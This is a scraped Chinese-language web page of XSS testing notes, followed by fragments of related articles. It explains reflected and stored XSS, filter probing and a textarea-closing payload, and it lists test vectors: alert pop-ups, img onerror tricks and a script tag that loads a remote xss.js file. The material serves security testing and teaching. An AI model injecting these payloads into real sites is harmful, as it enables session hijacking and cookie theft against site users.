xss跨站脚本测试

测试的时候会涉及到xss测试,下面简要整理下xss的知识

xss跨站脚本特点就是能注入恶意的HTML/JS代码到用户浏览器,劫持用户会话

常用alert来验证网站存在漏洞

如果确认存在漏洞,会随着注入的内容不同而产生危害

<script>alert("xss test");</script>

比如:窃取cookie,网页挂马,恶意操作,跨站蠕虫等等

分类:

反射型:非持久,一般为一个url,需要用户单击,在url中参数传入

持久型:常存在于评论等交互中,常见于<textarea>这种标签,可用于挂马钓鱼渗透等

简单发掘:

反射型:

1.验证网站是否过滤<>,在输入框输入test<testxss>,然后提交以后只显示test,说明<>可能被过滤

这时候需要进一步验证,查看网站源文件,搜索testxss,如果可搜索到,那就表示<>是可以写入的

2.然后输入<script>alert("xss test");</script>就是一个最简单的反射型xss攻击

持久型:

1. 一般在评论框中输入<script>alert("xss test");</script>以后,发现该语句不就没有被过滤

而且会被浏览器完整的显示出来,经过分析是因为别嵌入到<textarea>中了

所以可以先标签闭合,例如</textarea><script>alert("xss test");</script><textarea>

这种攻击比较严重,假如该评论需要后台管理员审核的话,随着其他xss语句就可以造成更大的危害

可见,为了防止xss,字符过滤可以有效的较少被攻击的危害,但是xss攻击不止这么简单,

它还可以绕过服务端的xss过滤!!!待续

ps:常用的xss攻击语句列表

https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet 英文

http://drops.wooyun.org/tips/1955 中文

时间: 2024-12-30 01:02:44

xss跨站脚本测试的相关文章

《xss跨站脚本剖析与防御》实验笔记

1.书籍<xss跨站脚本剖析与防御>上介绍的xss测试代码 <img src="javascrpt:alert('xss');">, <table background="javascrpt:alert(/xss/)"></table> 已经不能在多大数的浏览器上弹窗成功了 测试xss漏洞尽量改变习惯使用 <img src=1 oneRroR=alert(/XSS/)> <img src=1 oneR

目前日向博客对xss跨站脚本注入和sql注入的防范

昨天本博客受到了xss跨站脚本注入攻击,3分钟攻陷--其实攻击者进攻的手法很简单,没啥技术含量.只能感叹自己之前竟然完全没防范. 这是数据库里留下的一些记录.最后那人弄了一个无线循环弹出框的脚本,估计这个脚本之后他再想输入也没法了. 类似这种: <html> <body onload='while(true){alert(1)}'> </body> </html> 我立刻认识到这事件严重性,它说明我的博客有严重安全问题.因为xss跨站脚本攻击可能导致用户Co

XSS跨站脚本攻击

[XSS跨站脚本攻击] 1.在Get请求的值中插入代码. $name = $_GET['name']; echo "Welcome $name<br>"; 2.输入框中输入代码. 参考: 1.http://www.cnblogs.com/bangerlee/archive/2013/04/06/3002142.html

XSS:跨站脚本攻击

XSS:跨站脚本,是攻击者向目标web站点注入html标签或者脚本,如果web页面动态的产生文档内容,并且这些内容是基于用户提交的数据,而并没有通过从中移除任何嵌入的html标签来消毒的话,那这个web页面很容易遭到跨站脚本攻击. 例如,如下的web页面,它使用js通过用户的名字来向用户问好: <html> <head><title>test</title></head> <body> <script type="te

XSS跨站脚本初识

跨网站指令码(Cross-site scripting,通常简称为XSS)是一种网站应用程式的安全漏洞攻击,是代码注入的一种.它允许恶意使用者将程式码注入到网页上,其他使用者在观看网页时就会受到影响.这类攻击通常包含了HTML以及使用者端脚本语言. XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序.这些恶意网页程序通常是JavaScript,但实际上也可以包括Java,VBScript,ActiveX,Flash或者

PHP漏洞全解(四)-xss跨站脚本攻击

本文主要介绍针对PHP网站的xss跨站脚本攻击.跨站脚本攻击是通过在网页中加入恶意代码,当访问者浏览网页时恶意代码会被执行或者通过给管理员发信息 的方式诱使管理员浏览,从而获得管理员权限,控制整个网站.攻击者利用跨站请求伪造能够轻松地强迫用户的浏览器发出非故意的HTTP请求,如诈骗性的电汇 请求.修改口令和下载非法的内容等请求. XSS(Cross Site Scripting),意为跨网站脚本攻击,为了和样式表css(Cascading Style Sheet)区别,缩写为XSS 跨站脚本主要

初窥XSS跨站脚本攻击

XSS跨站脚本攻击的分类 一. 反射型XSS跨站脚本攻击 二. 存储型XSS跨站脚本攻击 三. 基于DOM的XSS跨站脚本攻击 1.反射性XSS

经典XSS跨站脚本集合汇总整理

1)普通的XSS JavaScript注入 <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT> (2)IMG标签XSS使用JavaScript命令 <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT> (3)IMG标签无分号无引号 <IMG SRC=javascript:alert('XSS')> (4)IMG标签大小写不敏感 <IMG SRC=JaVaScR

Web应用进行XSS漏洞测试

转自:http://www.uml.org.cn/Test/201407161.asp 对 WEB 应用进行 XSS 漏洞测试,不能仅仅局限于在 WEB 页面输入 XSS 攻击字段,然后提交.绕过 JavaScript 的检测,输入 XSS 脚本,通常被测试人员忽略.下图为 XSS 恶意输入绕过 JavaScript 检测的攻击路径. 常见的 XSS 输入 XSS 输入通常包含 JavaScript 脚本,如弹出恶意警告框:<script>alert("XSS");<